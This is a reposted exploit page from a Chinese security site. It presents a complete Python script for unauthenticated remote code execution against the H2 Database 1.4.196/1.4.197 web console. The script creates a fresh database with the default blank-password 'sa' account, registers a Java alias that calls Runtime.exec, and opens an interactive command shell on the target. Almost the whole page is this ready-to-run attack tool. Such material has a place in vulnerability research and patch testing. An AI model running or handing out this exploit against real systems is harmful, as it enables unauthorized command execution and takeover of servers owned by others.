首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
H2 Database 1.4.196 - Remote Code Execution
来源:vfocus.net 作者:h4ckNinja 发布时间:2018-10-08  
# Exploit Title: H2 Database 1.4.196 - Remote Code Execution
# Google Dork: N/A
# Date: 2018-09-24
# Exploit Author: h4ckNinja
# Vendor Homepage: https://www.h2database.com/
# Software Link: http://www.h2database.com/h2-2018-03-18.zip
# Version: 1.4.196 and 1.4.197
# Tested on: macOS/Linux
# CVE: N/A
 
# This takes advantage of the CREATE ALIAS RCE (https://www.exploit-db.com/exploits/44422/).
# When the test database has a password that is unknown, it is still possible to get the execution
# by creating a new database. The web console allows this by entering the name of the new database
# in the connection string. When the new database is created, the default credentials of
# username “sa” and password “” (blank) are created. The attacker is logged in automatically.
# The attached Python code, modified from 44422, demonstrates this.
 
#!/usr/bin/env python
 
'''
Exploit Title: Unauthenticated RCE
Date: 2018/09/24
Exploit Author: h4ckNinja
Vendor: http://www.h2database.com/
Version: all versions
Tested on: Linux, Mac
Description: Building on the Alias RCE, there's an authentication bypass to create a database, and then login to that one.
Modified from: https://www.exploit-db.com/exploits/44422/
'''
 
import random
import string
import sys
import argparse
import html
import requests
 
 
def getSession(host):
    url = 'http://{}'.format(host)
    r = requests.get(url)
    path = r.text.split('href = ')[1].split(';')[0].replace("'","").replace('.jsp', '.do')
 
    return '{}/{}'.format(url, path)
 
def login(url, database):
    data = {
        'language': 'en',
        'setting': 'Generic H2 (Embedded)',
        'name': 'Generic H2 (Embedded)',
        'driver': 'org.h2.Driver',
        'url': database,
        'user': 'sa',
        'password': ''
    }
 
    print('[*] Attempting to create database')
    r = requests.post(url, data=data)
 
    if '<th class="login">Login</th>' in r.text:
        return False
 
    print('[+] Created database and logged in')
 
    return True
 
def prepare(url):
    cmd = '''CREATE ALIAS EXECVE AS $$ String execve(String cmd) throws java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\\\A"); return s.hasNext() ? s.next() : "";  }$$;'''
    url = url.replace('login', 'query')
 
    print('[*] Sending stage 1')
 
    r = requests.post(url, data={'sql': cmd})
 
    if not 'NullPointerException' in r.text:
        print('[+] Shell succeeded - ^c or quit to exit')
        return url
 
    return False
 
def execve(url, cmd):
    r = requests.post(url, data={'sql':"CALL EXECVE('{}')".format(cmd)})
 
    try:
        execHTML = html.unescape(r.text.split('</th></tr><tr><td>')[1].split('</td>')[0].replace('<br />','\n').replace('&nbsp;',' ')).encode('utf-8').decode('utf-8','ignore')
        print(execHTML)
 
    except Exception as e:
        print('[-] Invalid command (' + str(e) + ')')
 
 
if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    randString = ''.join(random.choices(string.ascii_letters + string.digits, k=5))
 
    parser.add_argument('-H',
            '--host',
            dest='host',
            metavar='127.0.0.1:8082',
            help='Specify a host',
            required=True)
 
    parser.add_argument('-d',
            '--database-url',
            dest='database',
            metavar='jdbc:h2:~/emptydb-' + randString,
            default='jdbc:h2:~/emptydb-' + randString,
            help='Database URL',
            required=False)
 
    args = parser.parse_args()
 
url = getSession(args.host)
 
if login(url, args.database):
    success = prepare(url)
 
    if success:
        while True:
            try:
                cmd = input('h2-shell$ ')
 
                if 'quit' not in cmd:
                    execve(success, cmd)
 
                else:
                    print('[+] Shutting down')
                    sys.exit(0)
 
            except KeyboardInterrupt:
                print()
                print('[+] Shutting down')
                sys.exit(0)
 
    else:
        print('[-] Something went wrong injecting the payload.')
 
else:
    print('[-] Unable to login')
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Zahir Enterprise Plus 6 build
·FTP Voyager 16.2.0 - Denial of
·Snes9K 0.0.9z - Denial of Serv
·NICO-FTP 3.0.1.19 - Buffer Ove
·Linux Kernel 2.6.x / 3.10.x /
·ISPConfig < 3.1.13 - Remote Co
·AppArmor Filesystem Blacklisti
·Easy File Sharing Web Server 7
·CrossFont 7.5 - Denial of Serv
·Windows Net-NTLMv2 Reflection
·TransMac 12.2 - Denial of Serv
·Navigate CMS Unauthenticated R
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved